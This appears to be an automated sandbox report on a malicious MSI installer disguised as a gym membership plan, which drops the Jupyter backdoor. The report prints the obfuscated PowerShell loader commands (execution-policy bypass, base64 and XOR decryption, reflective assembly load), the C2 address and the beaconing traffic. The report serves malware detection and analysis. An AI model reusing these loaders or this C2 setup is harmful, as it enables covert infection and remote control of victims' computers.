Windows Analysis Report Nyship-Empire-Plan-Gym-Membership.msi

Overview

General Information

Sample Name: Nyship-Empire-Plan-Gym-Membership.msi
Analysis ID: 496721
MD5: f6118522893f3cd95198527d6f0282ba
SHA1: dd9b59d2553043a4740b9cd557c7dde0740050cf
SHA256: 5cf24553e521de102628e1ebdadb69a6623904f08b51cf5b1ea14779e03e8682

Detection

Jupyter
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected Jupyter backdoor
Yara detected Powershell dedcode and execute
Multi AV Scanner detection for submitted file
Sigma detected: Encoded FromBase64String
Sigma detected: Powershell Decrypt And Execute Base64 Data
Multi AV Scanner detection for dropped file
Sigma detected: FromBase64String Command Line
Bypasses PowerShell execution policy
Suspicious powershell command line found
Writes many files with high entropy
C2 URLs / IPs found in malware configuration
Powershell creates an autostart link
Queries the volume information (name, serial number etc) of a device
Yara signature match
Drops PE files to the application program directory (C:\ProgramData)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Stores large binary data to the registry
Stores files to the Windows start menu directory
JA3 SSL client fingerprint seen in connection with other malware
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
PE file contains executable resources (Code or Archives)
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
PE file contains strange resources
Adds / modifies Windows certificates
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Drops PE files to the windows directory (C:\Windows)
Creates a start menu entry (Start Menu\Programs\Startup)
Registers a DLL
PE / OLE file has an invalid certificate
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Checks for available system drives (often done to infect USB drives)
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w10x64
  • msiexec.exe (PID: 6320 cmdline: 'C:\Windows\System32\msiexec.exe' /i 'C:\Users\user\Desktop\Nyship-Empire-Plan-Gym-Membership.msi' MD5: 4767B71A318E201188A0D0A420C8B608)
  • msiexec.exe (PID: 4660 cmdline: C:\Windows\system32\msiexec.exe /V MD5: 4767B71A318E201188A0D0A420C8B608)
    • msiexec.exe (PID: 5732 cmdline: C:\Windows\System32\MsiExec.exe -Embedding B7C7A506E4E2E0AFFC1F9F29629DA729 C MD5: 4767B71A318E201188A0D0A420C8B608)
    • msiexec.exe (PID: 6024 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 9EA879A27423DE072DACED38067EC0CA MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
    • msiexec.exe (PID: 6656 cmdline: C:\Windows\System32\MsiExec.exe -Embedding 9C2DD99C4B00F4D44E912718317921B1 MD5: 4767B71A318E201188A0D0A420C8B608)
      • PDFsamEnhanced7Installer.exe (PID: 616 cmdline: 'C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exe' MD5: 801B1B11E979AF812CA4387E5F438AD8)
        • regsvr32.exe (PID: 6964 cmdline: regsvr32.exe /s 'C:\ProgramData\PDFsam Enhanced 7\Installation\Statistics.dll' MD5: 426E7499F6A7346F0410DEAD0805586B)
        • PDFsam_Enhanced_7_Installer.exe (PID: 7016 cmdline: 'C:\ProgramData\PDFsam Enhanced 7\Installation\PDFsam_Enhanced_7_Installer.exe' /RegServer MD5: 801B1B11E979AF812CA4387E5F438AD8)
      • powershell.exe (PID: 2212 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ep bypass -windowstyle hidden -command '$xp='C:\Users\user\AppData\Roaming\pdata.txt';$xk='OKqCcHRdijfpJwFXYoITZksyPxUgvDnAezLuESWBMNGQatVhbrlm';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length;}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;' MD5: 95000560239032BC68B4C2FDFCDEF913)
        • conhost.exe (PID: 2340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • powershell.exe (PID: 6916 cmdline: 'PowerShell.exe' -WINDOWsTyLe HIdden -Ep bYPass -CoMmaND '$ac46caf9ffc4c7b839941d3e2c350='QFVuLWVAczZMYUB0QiZiXk5FK1leUlRSPT81TUh2cFBRS1NtV1FKOG4hMjl4Z3I9NEF0ZkdxWHQlI0tLZn14UHt1YX1QVG9+d0BXdjZHPGxsYXopXlIxPGVeb0BhYD1id1Zgc0swXm5nT1FCI3RjLSo3ai1SM01xbVBhQW9gSUN9cDB9e19mUUZwJXJrYlBsai1JbWZ6bFhjPnBOekVlamsxflp1OWQwcmZzQkxqdEQyP3BqLTkzUnl7P3x+ZnVObzl2V2tpR3dTdSh0Z3stPg==';$aae4ceb7c424279fcf464cdcde86d=[sYstem.iO.FIle]::reaDAllbYTes('C:\Users\user\AppData\Roaming\MICroSoFT\UkpPOYBgmRz\KsTLyOZYmIAkr.IKlPnJSyzYBUXe');fOr($aef4ae006e446f92dc4680e0da252=0;$aef4ae006e446f92dc4680e0da252 -LT $aae4ceb7c424279fcf464cdcde86d.count;){For($a4e46636d5944397119672019e333=0;$a4e46636d5944397119672019e333 -LT $ac46caf9ffc4c7b839941d3e2c350.LenGtH;$a4e46636d5944397119672019e333++){$aae4ceb7c424279fcf464cdcde86d[$aef4ae006e446f92dc4680e0da252]=$aae4ceb7c424279fcf464cdcde86d[$aef4ae006e446f92dc4680e0da252] -bxoR $ac46caf9ffc4c7b839941d3e2c350[$a4e46636d5944397119672019e333];$aef4ae006e446f92dc4680e0da252++;IF($aef4ae006e446f92dc4680e0da252 -GE $aae4ceb7c424279fcf464cdcde86d.coUNT){$a4e46636d5944397119672019e333=$ac46caf9ffc4c7b839941d3e2c350.lenGtH}}};[sYsTeM.ReflEcTIon.asseMbLy]::lOAd($aae4ceb7c424279fcf464cdcde86d);[a58b92819f74a08223fbd41c9efcf.a081375717c4dabd0e9d5ff272624]::a2311544abd4fcba55524af320681()' MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 6244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

Malware Configuration

Threatname: Jupyter Backdoor

{"Version": "OC-1", "C2 url": "http://146.70.41.157"}

Yara Overview

Initial Sample

Source: Nyship-Empire-Plan-Gym-Membership.msi, Rule: JoeSecurity_PowershellDedcodeAndExecute, Description: Yara detected Powershell dedcode and execute, Author: Joe Security

Dropped Files

Source: C:\Users\user\Documents\20211004\PowerShell_transcript.377142.wm8KM1k2.20211004212820.txt, Rule: JoeSecurity_PowershellDedcodeAndExecute, Description: Yara detected Powershell dedcode and execute, Author: Joe Security
Source: C:\Windows\Installer\MSI113A.tmp, Rule: JoeSecurity_PowershellDedcodeAndExecute, Description: Yara detected Powershell dedcode and execute, Author: Joe Security
Source: C:\Windows\Installer\5206a8.msi, Rule: JoeSecurity_PowershellDedcodeAndExecute, Description: Yara detected Powershell dedcode and execute, Author: Joe Security
Source: C:\Windows\Installer\5206aa.msi, Rule: JoeSecurity_PowershellDedcodeAndExecute, Description: Yara detected Powershell dedcode and execute, Author: Joe Security

Memory Dumps

Source: 00000015.00000002.991996984.00000273C9B50000.00000004.00020000.sdmp, Rule: JoeSecurity_Jupyter, Description: Yara detected Jupyter backdoor, Author: Joe Security
Source: 00000009.00000003.740405887.000001B512853000.00000004.00000001.sdmp, Rule: SUSP_LNK_SuspiciousCommands, Description: Detects LNK file with suspicious content, Author: Florian Roth
Source: 00000009.00000003.749058298.000001B512853000.00000004.00000001.sdmp, Rule: SUSP_LNK_SuspiciousCommands, Description: Detects LNK file with suspicious content, Author: Florian Roth
Source: 00000015.00000002.946342181.00000273B17C0000.00000004.00000001.sdmp, Rule: JoeSecurity_Jupyter, Description: Yara detected Jupyter backdoor, Author: Joe Security
Source: 00000009.00000003.739854732.000001B512853000.00000004.00000001.sdmp, Rule: SUSP_LNK_SuspiciousCommands, Description: Detects LNK file with suspicious content, Author: Florian Roth

Unpacked PEs

Source: 21.2.powershell.exe.273b1806fc8.0.unpack, Rule: JoeSecurity_Jupyter, Description: Yara detected Jupyter backdoor, Author: Joe Security
Source: 21.2.powershell.exe.273b1806fc8.0.raw.unpack, Rule: JoeSecurity_Jupyter, Description: Yara detected Jupyter backdoor, Author: Joe Security
Source: 21.2.powershell.exe.273c9b50000.1.raw.unpack, Rule: JoeSecurity_Jupyter, Description: Yara detected Jupyter backdoor, Author: Joe Security
Source: 21.2.powershell.exe.273c9b50000.1.unpack, Rule: JoeSecurity_Jupyter, Description: Yara detected Jupyter backdoor, Author: Joe Security

Sigma Overview

System Summary:

Sigma detected: Encoded FromBase64String
Source: Process started, Author: Florian Roth, Data: Command (CommandLine and ProcessCommandLine carry the same value): 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ep bypass -windowstyle hidden -command '$xp='C:\Users\user\AppData\Roaming\pdata.txt';$xk='OKqCcHRdijfpJwFXYoITZksyPxUgvDnAezLuESWBMNGQatVhbrlm';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length;}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\MsiExec.exe -Embedding 9C2DD99C4B00F4D44E912718317921B1, ParentImage: C:\Windows\System32\msiexec.exe, ParentProcessId: 6656, ProcessId: 2212
Sigma detected: FromBase64String Command Line
Source: Process started, Author: Florian Roth, Data: Command (CommandLine and ProcessCommandLine carry the same value): 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ep bypass -windowstyle hidden -command '$xp='C:\Users\user\AppData\Roaming\pdata.txt';$xk='OKqCcHRdijfpJwFXYoITZksyPxUgvDnAezLuESWBMNGQatVhbrlm';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length;}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\MsiExec.exe -Embedding 9C2DD99C4B00F4D44E912718317921B1, ParentImage: C:\Windows\System32\msiexec.exe, ParentProcessId: 6656, ProcessId: 2212
Sigma detected: Non Interactive PowerShell
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command (CommandLine and ProcessCommandLine carry the same value): 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ep bypass -windowstyle hidden -command '$xp='C:\Users\user\AppData\Roaming\pdata.txt';$xk='OKqCcHRdijfpJwFXYoITZksyPxUgvDnAezLuESWBMNGQatVhbrlm';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length;}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\MsiExec.exe -Embedding 9C2DD99C4B00F4D44E912718317921B1, ParentImage: C:\Windows\System32\msiexec.exe, ParentProcessId: 6656, ProcessId: 2212
Sigma detected: T1086 PowerShell Execution
Source: Pipe created, Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Data: PipeName: \PSHost.132778492979659065.2212.DefaultAppDomain.powershell

Data Obfuscation:

Sigma detected: Powershell Decrypt And Execute Base64 Data
Source: Process started, Author: Joe Security, Data: Command (CommandLine and ProcessCommandLine carry the same value): 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ep bypass -windowstyle hidden -command '$xp='C:\Users\user\AppData\Roaming\pdata.txt';$xk='OKqCcHRdijfpJwFXYoITZksyPxUgvDnAezLuESWBMNGQatVhbrlm';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length;}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\MsiExec.exe -Embedding 9C2DD99C4B00F4D44E912718317921B1, ParentImage: C:\Windows\System32\msiexec.exe, ParentProcessId: 6656, ProcessId: 2212

                        Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 21.2.powershell.exe.273b1806fc8.0.raw.unpack, Malware Configuration Extractor: Jupyter Backdoor {"Version": "OC-1", "C2 url": "http://146.70.41.157"}
Multi AV Scanner detection for submitted file
Source: Nyship-Empire-Plan-Gym-Membership.msi, Virustotal: Detection: 12%
Multi AV Scanner detection for dropped file
Source: C:\ProgramData\PDFsam Enhanced 7\Installation\PDFsam_Enhanced_7_Installer.exe, ReversingLabs: Detection: 20%
Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exe, ReversingLabs: Detection: 20%
Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp, Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Windows\System32\msiexec.exe, Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{92DEF4EC-9A2A-492B-8CB2-EA5C3D67E621}
Source: unknown, HTTPS traffic detected: 64.15.159.234:443 -> 192.168.2.4:49785 version: TLS 1.2
                        Source: Binary string: ?crypto\stack\stack.ccompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASMcrypto\ex_data.c source: PDFsamEnhanced7Installer.exe, 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmp
                        Source: Binary string: D:\TemporaryBuilds\installer_builder_1\66\s\_bin\pdfsam7\Win32\Statistics.pdb> source: PDFsamEnhanced7Installer.exe, 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000000.712904817.0000000000F9D000.00000002.00020000.sdmp
                        Source: Binary string: D:\TemporaryBuilds\installer_builder_1\66\s\_bin\pdfsam7\Win32\PDFsam_Enhanced_7_Installer.pdb source: PDFsamEnhanced7Installer.exe, 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmp
                        Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM source: PDFsamEnhanced7Installer.exe, 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmp
                        Source: Binary string: D:\TemporaryBuilds\installer_builder_1\66\s\_bin\pdfsam7\Win32\Statistics.pdb source: PDFsamEnhanced7Installer.exe, 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000000.712904817.0000000000F9D000.00000002.00020000.sdmp
Source: C:\Windows\System32\msiexec.exe, File opened: z:
Source: C:\Windows\System32\msiexec.exe, File opened: x:
Source: C:\Windows\System32\msiexec.exe, File opened: v:
Source: C:\Windows\System32\msiexec.exe, File opened: t:
Source: C:\Windows\System32\msiexec.exe, File opened: r:
Source: C:\Windows\System32\msiexec.exe, File opened: p:
Source: C:\Windows\System32\msiexec.exe, File opened: n:
Source: C:\Windows\System32\msiexec.exe, File opened: l:
Source: C:\Windows\System32\msiexec.exe, File opened: j:
Source: C:\Windows\System32\msiexec.exe, File opened: h:
Source: C:\Windows\System32\msiexec.exe, File opened: f:
Source: C:\Windows\System32\msiexec.exe, File opened: b:
Source: C:\Windows\System32\msiexec.exe, File opened: y:
Source: C:\Windows\System32\msiexec.exe, File opened: w:
Source: C:\Windows\System32\msiexec.exe, File opened: u:
Source: C:\Windows\System32\msiexec.exe, File opened: s:
Source: C:\Windows\System32\msiexec.exe, File opened: q:
Source: C:\Windows\System32\msiexec.exe, File opened: o:
Source: C:\Windows\System32\msiexec.exe, File opened: m:
Source: C:\Windows\System32\msiexec.exe, File opened: k:
Source: C:\Windows\System32\msiexec.exe, File opened: i:
Source: C:\Windows\System32\msiexec.exe, File opened: g:
Source: C:\Windows\System32\msiexec.exe, File opened: e:
Source: C:\Windows\System32\conhost.exe, File opened: c:
Source: C:\Windows\System32\msiexec.exe, File opened: a:
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: http://146.70.41.157
Source: Joe Sandbox View, ASN Name: TENET-1ZA TENET-1ZA
Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic, HTTP traffic detected: POST / HTTP/1.1, Host: 146.70.41.157, Content-Length: 313, Connection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 509
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 415
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 675
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 612
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 640
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 600
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 474
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 464
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 705
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 721
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 322
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 665
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 277
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 653
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 443
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 674
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 609
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 644
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 713
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 303
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 627
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 674
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 416
                        Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49785
                        Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49781
                        Source: unknown; Network traffic detected: HTTP traffic on port 49785 -> 443
                        Source: unknown; Network traffic detected: HTTP traffic on port 49781 -> 443
                        Source: unknown; TCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: powershell.exe, 00000015.00000002.991996984.00000273C9B50000.00000004.00020000.sdmp, powershell.exe, 00000015.00000002.946342181.00000273B17C0000.00000004.00000001.sdmp; String found in binary or memory: http://146.70.41.157
                        Source: powershell.exe, 00000015.00000003.919044923.00000273C99C3000.00000004.00000001.sdmp; String found in binary or memory: http://146.70.41.157/
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694522254.0000000004AC3000.00000004.00000001.sdmpString found in binary or memory: http://postsignum.ttc.cz/crl/psrootqca2.crl0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694522254.0000000004AC3000.00000004.00000001.sdmpString found in binary or memory: http://repository.swisssign.com/0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000000.712904817.0000000000F9D000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/arrayTypeEnvelopeBody
                        Source: PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000000.712904817.0000000000F9D000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/VersionMismatchSOAP
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.986792614.0000000005720000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/d=
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.986792614.0000000005720000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/le
                        Source: powershell.exe, 00000015.00000002.943270135.00000273B15B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694790490.0000000004A21000.00000004.00000001.sdmpString found in binary or memory: http://sertifikati.ca.posta.rs/crl/PostaCARoot.crl0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmpString found in binary or memory: http://tempuri.org/
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmpString found in binary or memory: http://tempuri.org/AddBug
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000000.712904817.0000000000F9D000.00000002.00020000.sdmpString found in binary or memory: http://tempuri.org/CompressSimpleTrackSetup
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmpString found in binary or memory: http://tempuri.org/http://tempuri.org/IdIdProductNameProductNameFilesFilesAddAttachesParameterAddAtt
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000000.712904817.0000000000F9D000.00000002.00020000.sdmpString found in binary or memory: http://tempuri.org/http://tempuri.org/Messagedescriptioncpudatadata
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694522254.0000000004AC3000.00000004.00000001.sdmpString found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.986131431.00000000052C0000.00000004.00000040.sdmp, PDFsamEnhanced7Installer.exe, 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmpString found in binary or memory: http://upclick.com/
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp, PDFsamEnhanced7Installer.exe, 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000000.712904817.0000000000F9D000.00000002.00020000.sdmpString found in binary or memory: http://upclick.com/GetLocationInfo
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.986792614.0000000005720000.00000004.00000001.sdmpString found in binary or memory: http://upclick.com/d=
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmpString found in binary or memory: http://upclick.com/http://upclick.com/HTTP_X_FORWARDED_FORHTTP_X_FORWARDED_FORGetGeoInfoByHeadersRes
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000000.712904817.0000000000F9D000.00000002.00020000.sdmpString found in binary or memory: http://upclick.com/http://upclick.com/HTTP_X_FORWARDED_FORHTTP_X_FORWARDED_FORREMOTE_ADDRGetGeoInfoB
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.986792614.0000000005720000.00000004.00000001.sdmpString found in binary or memory: http://upclick.com/le
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694522254.0000000004AC3000.00000004.00000001.sdmpString found in binary or memory: http://web.ncdc.gov.sa/crl/nrcacomb1.crl0
